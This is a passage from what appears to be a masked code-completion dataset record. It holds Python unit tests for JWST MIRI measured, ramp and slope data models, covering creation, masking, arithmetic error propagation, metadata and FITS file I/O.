self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)\n self.assertTrue(np.all(mask1.dq == mask1.pixeldq))\n del mask1\n mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='groupdq')\n self.assertIsNotNone(mask2.groupdq)\n self.assertGreater(len(mask2.groupdq), 0)\n self.assertIsNotNone(mask2.dq)\n self.assertGreater(len(mask2.dq), 0)\n self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)\n self.assertTrue(np.all(mask2.dq == mask2.groupdq))\n del mask2\n mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n self.assertIsNotNone(mask3.pixeldq)\n self.assertGreater(len(mask3.pixeldq), 0)\n self.assertIsNotNone(mask3.groupdq)\n self.assertGreater(len(mask3.groupdq), 0)\n self.assertIsNotNone(mask3.dq)\n self.assertGreater(len(mask3.dq), 0)\n self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)\n expected = mask3.groupdq | mask3.pixeldq\n self.assertTrue(np.all(mask3.dq == expected))\n del mask3\n\n def test_arithmetic(self):\n testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n descr = str(testdp)\n self.assertIsNotNone(descr)\n del descr\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n double = testdp * 2.0\n self.assertIsNotNone(double.data)\n self.assertGreater(len(double.data), 0)\n expected = double.data * 2.0\n self.assertTrue(np.all(double.data - expected < 0.001))\n descr = str(double)\n self.assertIsNotNone(descr)\n del descr\n warnings.simplefilter('ignore')\n result = self.dataproduct + testdp\n self.assertIsNotNone(result.data)\n self.assertGreater(len(result.data), 0)\n self.assertIsNotNone(result.dq)\n self.assertGreater(len(result.dq), 0)\n descr = str(result)\n self.assertIsNotNone(descr)\n del descr\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriRampModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'refout', 'pixeldq', 'groupdq'], tables\n =['pixeldq_def', 'groupdq_def'])\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.refout)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriSlopeModel(unittest.TestCase):\n\n def setUp(self):\n a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n acube = [a1, a1, a1]\n bcube = [b1, b1, b1]\n ccube = [c1, c1, c1]\n dcube = [a1, b1, a1]\n self.dataproduct = MiriSlopeModel(data=acube, err=bcube, dq=ccube,\n dq_def=master_flags, zeropt=dcube, fiterr=dcube)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIMAGE', filt=\n 'F2550W', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='SLOW', nints=3,\n ngroups=10, frame_time=1.0, integration_time=100.0, group_time=\n 1000.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriSlopeModel_test.fits'\n\n def tearDown(self):\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n a1d = [10, 20, 30, 40]\n b1d = [1, 2, 3, 4]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d, dq=c1d\n )\n a2d = [a1d, a1d, a1d]\n b2d = [b1d, b1d, b1d]\n c2d = [c1d, c1d, c1d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d, dq=c2d\n )\n a3d = [a2d, a2d]\n b3d = [b2d, b2d]\n c3d = [c2d, c2d]\n a4d = [a3d, a3d]\n b4d = [b3d, b3d]\n c4d = [c3d, c3d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d, dq=c4d\n )\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq', 'nreads', 'readsat', 'ngoodseg', 'zeropt',\n 'fiterr'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriSlopeModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq', 'nreads', 'readsat',\n 'ngoodseg', 'zeropt', 'fiterr'], tables='dq_def')\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestMiriMeasuredModel(unittest.TestCase):\n <mask token>\n <mask token>\n\n def test_creation(self):\n dq_def_names = list(MiriMeasuredModel.dq_def_names)\n schema_names = list(self.dataproduct.get_field_names('dq_def'))\n self.assertEqual(dq_def_names, schema_names,\n \"'dq_def_names' class variable does not match schema\")\n a2 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n newdp1 = MiriMeasuredModel(data=a2)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.err)\n self.assertEqual(newdp1.err.shape, newdp1.data.shape)\n self.assertAlmostEqual(np.mean(newdp1.err), 0.0)\n self.assertIsNotNone(newdp1.dq)\n self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)\n self.assertEqual(np.mean(newdp1.dq), 0)\n descr1 = str(newdp1)\n self.assertIsNotNone(descr1)\n del newdp1, descr1\n newdp2 = MiriMeasuredModel(data=a2, err=b2)\n self.assertIsNotNone(newdp2.data)\n self.assertGreater(len(newdp2.data), 0)\n self.assertIsNotNone(newdp2.err)\n self.assertEqual(newdp2.err.shape, newdp2.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)\n self.assertIsNotNone(newdp2.dq)\n self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)\n self.assertEqual(np.mean(newdp2.dq), 0)\n descr2 = str(newdp2)\n self.assertIsNotNone(descr2)\n del newdp2, descr2\n newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.err)\n self.assertEqual(newdp3.err.shape, newdp3.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)\n self.assertIsNotNone(newdp3.dq)\n self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)\n self.assertNotEqual(np.mean(newdp3.dq), 0)\n descr3 = str(newdp3)\n self.assertIsNotNone(descr3)\n del newdp3, descr3\n emptydp = MiriMeasuredModel((4, 4))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (4, 4))\n self.assertIsNotNone(emptydp.err)\n self.assertEqual(emptydp.err.shape, (4, 4))\n self.assertIsNotNone(emptydp.dq)\n self.assertEqual(emptydp.dq.shape, (4, 4))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriMeasuredModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(a2)\n self.assertIsNotNone(nulldp.err)\n self.assertIsNotNone(nulldp.dq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n scalardp = MiriMeasuredModel(data=42)\n self.assertEqual(scalardp.data, 42)\n self.assertIsNotNone(scalardp.err)\n self.assertIsNotNone(scalardp.dq)\n descr = str(scalardp)\n self.assertIsNotNone(descr)\n del scalardp, descr\n self.assertRaises(ValueError, MiriMeasuredModel, init=[])\n self.assertRaises(ValueError, MiriMeasuredModel, init=42)\n self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name'\n )\n self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')\n self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')\n\n def test_metadata(self):\n kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n telname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.meta.telescope\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.get_fits_keyword('TELESCOP')\n self.assertEqual(telname, 'JWST')\n kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n insname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.meta.instrument.name\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.get_fits_keyword('INSTRUME')\n self.assertEqual(insname, 'MIRI')\n self.simpleproduct.add_history('History 1')\n self.simpleproduct.add_history('History 2')\n self.simpleproduct.add_history('History 3')\n self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)\n strg = self.simpleproduct.get_history_str()\n self.assertIsNotNone(strg)\n self.assertGreater(len(strg), 0)\n <mask token>\n <mask token>\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.simpleproduct.save(self.testfile1, overwrite=True)\n with MiriMeasuredModel(self.testfile1) as readback:\n self.assertTrue(np.allclose(self.simpleproduct.data,\n readback.data))\n del readback\n self.dataproduct.save(self.testfile2, overwrite=True)\n with MiriMeasuredModel(self.testfile2) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq'], tables='dq_def')\n del readback\n\n def test_asciiio(self):\n pass\n\n def test_masking(self):\n a2 = [[10, 999, 10, 999], [999, 10, 10, 999], [10, 10, 999, 10]]\n b2 = [[1, 99, 1, 99], [99, 1, 1, 99], [1, 1, 99, 1]]\n c2 = [[0, 1, 0, 1], [1, 0, 0, 1], [0, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2)\n meandata = np.mean(newdp.data_masked)\n self.assertGreater(meandata, 10)\n meanerr = np.mean(newdp.err_masked)\n self.assertGreater(meanerr, 1)\n newdp2 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n meandata2 = np.mean(newdp2.data_masked)\n self.assertAlmostEqual(meandata2, 10)\n meanerr2 = np.mean(newdp2.err_masked)\n self.assertAlmostEqual(meanerr2, 1)\n del newdp, newdp2\n\n def test_arithmetic(self):\n a2 = [[90, 80, 70, 60], [50, 40, 30, 20], [10, 0, -10, -20]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[0, 1, 1, 0], [0, 2, 0, 2], [1, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n newsimple = self.simpleproduct - self.simpleproduct\n self.assertAlmostEqual(newsimple.data.all(), 0.0)\n del newsimple\n result = self.dataproduct + 42\n test1 = self.dataproduct.data + 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct + newdp\n test1 = self.dataproduct.data + newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct - 42\n test1 = self.dataproduct.data - 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct - newdp\n test1 = self.dataproduct.data - newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct + newdp - newdp\n test1 = self.dataproduct.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * 3\n test1 = self.dataproduct.data * 3\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * newdp\n test1 = self.dataproduct.data * newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n err1 = self.dataproduct.err\n da1 = self.dataproduct.data\n err2 = newdp.err\n da2 = newdp.data\n expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1\n )\n self.assertTrue(np.array_equal(expectedErr, result.err))\n del result, da1, da2, err1, err2, expectedErr\n result = self.dataproduct / 3.0\n test1 = self.dataproduct.data / 3.0\n test2 = result.data\n self.assertAlmostEqual(test1.all(), test2.all())\n del test1, test2, result\n self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n result = self.dataproduct / newdp\n test1 = self.dataproduct.data / newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n dat = self.dataproduct.data[1][1]\n newdat = newdp.data[1][1]\n resultErr = result.err[1][1]\n dpErr = self.dataproduct.err[1][1]\n newdpErr = newdp.err[1][1]\n expectErr = np.sqrt(dpErr * dpErr / (newdat * newdat) + \n newdpErr * newdpErr * dat * dat / (newdat * newdat * newdat *\n newdat))\n self.assertEqual(expectErr, resultErr)\n del test1, test2, result\n newdp2 = newdp * 2\n newdp3 = newdp * 3\n newdp4 = newdp2 + newdp3\n result = (self.dataproduct - newdp) * newdp2 / newdp3 + newdp4\n del newdp, newdp2, newdp3, newdp4\n del result\n <mask token>\n\n def test_description(self):\n descr = str(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.simpleproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.err)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriRampModel(unittest.TestCase):\n\n def setUp(self):\n self.a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n self.c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.c2 = [[0, 1, 1, 0], [1, 0, 0, 1], [1, 0, 1, 0]]\n self.acube = [self.a1, self.a1, self.a1]\n self.ccube = [self.c1, self.c2, self.c1]\n self.ahyper = [self.acube, self.acube]\n self.chyper = [self.ccube, self.ccube]\n self.refout = np.ones_like(self.chyper)\n self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.\n refout, pixeldq=self.c1, dq_def=pixeldq_flags, groupdq=self.\n chyper, groupdq_def=groupdq_flags)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriRampModel_test.fits'\n\n def tearDown(self):\n del self.a1, self.c1, self.c2\n del self.acube, self.ccube\n del self.ahyper, self.chyper\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n bcube = [b1, b1, b1]\n bhyper = [bcube, bcube]\n newdp1 = MiriRampModel(data=self.ahyper)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.pixeldq)\n self.assertTrue(newdp1.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp1.groupdq)\n self.assertTrue(newdp1.groupdq.ndim == 4)\n self.assertEqual(np.mean(newdp1.groupdq), 0)\n descr1 = str(newdp1)\n del newdp1, descr1\n newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.pixeldq)\n self.assertTrue(newdp3.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp3.pixeldq), 0)\n self.assertIsNotNone(newdp3.groupdq)\n self.assertTrue(newdp3.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp3.groupdq), 0)\n descr3 = str(newdp3)\n del newdp3, descr3\n newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)\n self.assertIsNotNone(newdp4.data)\n self.assertGreater(len(newdp4.data), 0)\n self.assertIsNotNone(newdp4.pixeldq)\n self.assertTrue(newdp4.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp4.pixeldq), 0)\n self.assertIsNotNone(newdp4.groupdq)\n self.assertTrue(newdp4.groupdq.ndim == 4)\n descr4 = str(newdp4)\n del newdp4, descr4\n newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)\n self.assertIsNotNone(newdp5.data)\n self.assertGreater(len(newdp5.data), 0)\n self.assertIsNotNone(newdp5.pixeldq)\n self.assertTrue(newdp5.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp5.groupdq)\n self.assertTrue(newdp5.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp5.groupdq), 0)\n descr5 = str(newdp5)\n del newdp5, descr5\n emptydp = MiriRampModel((2, 2, 2, 2))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (2, 2, 2, 2))\n self.assertIsNotNone(emptydp.pixeldq)\n self.assertIsNotNone(emptydp.groupdq)\n self.assertEqual(emptydp.groupdq.shape, (2, 2, 2, 2))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriRampModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(self.ahyper)\n self.assertIsNotNone(nulldp.pixeldq)\n self.assertIsNotNone(nulldp.groupdq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n a1d = [10, 20, 30, 40]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)\n a2d = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n c2d = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.assertRaises(ValueError, MiriRampModel, data=a2d, groupdq=c2d)\n a3d = [a2d, a2d, a2d]\n c3d = [c2d, c2d, c2d]\n self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=a3d, groupdq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n pixeldq=self.ccube)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n groupdq=self.c1)\n\n def test_masking(self):\n self.assertIsNotNone(self.dataproduct.dq)\n mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='pixeldq')\n self.assertIsNotNone(mask1.pixeldq)\n self.assertGreater(len(mask1.pixeldq), 0)\n self.assertIsNotNone(mask1.dq)\n self.assertGreater(len(mask1.dq), 0)\n self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)\n self.assertTrue(np.all(mask1.dq == mask1.pixeldq))\n del mask1\n mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='groupdq')\n self.assertIsNotNone(mask2.groupdq)\n self.assertGreater(len(mask2.groupdq), 0)\n self.assertIsNotNone(mask2.dq)\n self.assertGreater(len(mask2.dq), 0)\n self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)\n self.assertTrue(np.all(mask2.dq == mask2.groupdq))\n del mask2\n mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n self.assertIsNotNone(mask3.pixeldq)\n self.assertGreater(len(mask3.pixeldq), 0)\n self.assertIsNotNone(mask3.groupdq)\n self.assertGreater(len(mask3.groupdq), 0)\n self.assertIsNotNone(mask3.dq)\n self.assertGreater(len(mask3.dq), 0)\n self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)\n expected = mask3.groupdq | mask3.pixeldq\n self.assertTrue(np.all(mask3.dq == expected))\n del mask3\n\n def test_arithmetic(self):\n testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n descr = str(testdp)\n self.assertIsNotNone(descr)\n del descr\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n double = testdp * 2.0\n self.assertIsNotNone(double.data)\n self.assertGreater(len(double.data), 0)\n expected = double.data * 2.0\n self.assertTrue(np.all(double.data - expected < 0.001))\n descr = str(double)\n self.assertIsNotNone(descr)\n del descr\n warnings.simplefilter('ignore')\n result = self.dataproduct + testdp\n self.assertIsNotNone(result.data)\n self.assertGreater(len(result.data), 0)\n self.assertIsNotNone(result.dq)\n self.assertGreater(len(result.dq), 0)\n descr = str(result)\n self.assertIsNotNone(descr)\n del descr\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriRampModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'refout', 'pixeldq', 'groupdq'], tables\n =['pixeldq_def', 'groupdq_def'])\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.refout)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriSlopeModel(unittest.TestCase):\n\n def setUp(self):\n a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n acube = [a1, a1, a1]\n bcube = [b1, b1, b1]\n ccube = [c1, c1, c1]\n dcube = [a1, b1, a1]\n self.dataproduct = MiriSlopeModel(data=acube, err=bcube, dq=ccube,\n dq_def=master_flags, zeropt=dcube, fiterr=dcube)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIMAGE', filt=\n 'F2550W', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='SLOW', nints=3,\n ngroups=10, frame_time=1.0, integration_time=100.0, group_time=\n 1000.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriSlopeModel_test.fits'\n\n def tearDown(self):\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n a1d = [10, 20, 30, 40]\n b1d = [1, 2, 3, 4]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d, dq=c1d\n )\n a2d = [a1d, a1d, a1d]\n b2d = [b1d, b1d, b1d]\n c2d = [c1d, c1d, c1d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d, dq=c2d\n )\n a3d = [a2d, a2d]\n b3d = [b2d, b2d]\n c3d = [c2d, c2d]\n a4d = [a3d, a3d]\n b4d = [b3d, b3d]\n c4d = [c3d, c3d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d, dq=c4d\n )\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq', 'nreads', 'readsat', 'ngoodseg', 'zeropt',\n 'fiterr'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriSlopeModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq', 'nreads', 'readsat',\n 'ngoodseg', 'zeropt', 'fiterr'], tables='dq_def')\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestMiriMeasuredModel(unittest.TestCase):\n\n def setUp(self):\n self.data = np.linspace(0.0, 100000.0, 64 * 64)\n self.data.shape = [64, 64]\n self.simpleproduct = MiriMeasuredModel(data=self.data)\n self.simpleproduct.set_housekeeping_metadata('MIRI EC',\n 'Joe Bloggs', 'V1.0')\n self.simpleproduct.set_instrument_metadata(detector='MIRIMAGE',\n filt='F560W', ccc_pos='OPEN', deck_temperature=10.0,\n detector_temperature=7.0)\n self.simpleproduct.set_exposure_metadata(readpatt='SLOW', nints=1,\n ngroups=10, frame_time=30.0, integration_time=30.0, group_time=\n 300.0, reset_time=0, frame_resets=3)\n self.primary = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]\n ]\n self.error = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n self.quality = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.dataproduct = MiriMeasuredModel(data=self.primary, err=self.\n error, dq=self.quality, dq_def=master_flags)\n self.dataproduct.set_instrument_metadata(detector='MIRIFUSHORT',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile1 = 'MiriMeasuredModel_test1.fits'\n self.testfile2 = 'MiriMeasuredModel_test2.fits'\n self.tempfiles = [self.testfile1, self.testfile2]\n\n def tearDown(self):\n del self.dataproduct\n del self.primary, self.error, self.quality\n del self.simpleproduct\n del self.data\n for tempfile in self.tempfiles:\n if os.path.isfile(tempfile):\n try:\n os.remove(tempfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + tempfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n del self.tempfiles\n\n def test_creation(self):\n dq_def_names = list(MiriMeasuredModel.dq_def_names)\n schema_names = list(self.dataproduct.get_field_names('dq_def'))\n self.assertEqual(dq_def_names, schema_names,\n \"'dq_def_names' class variable does not match schema\")\n a2 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n newdp1 = 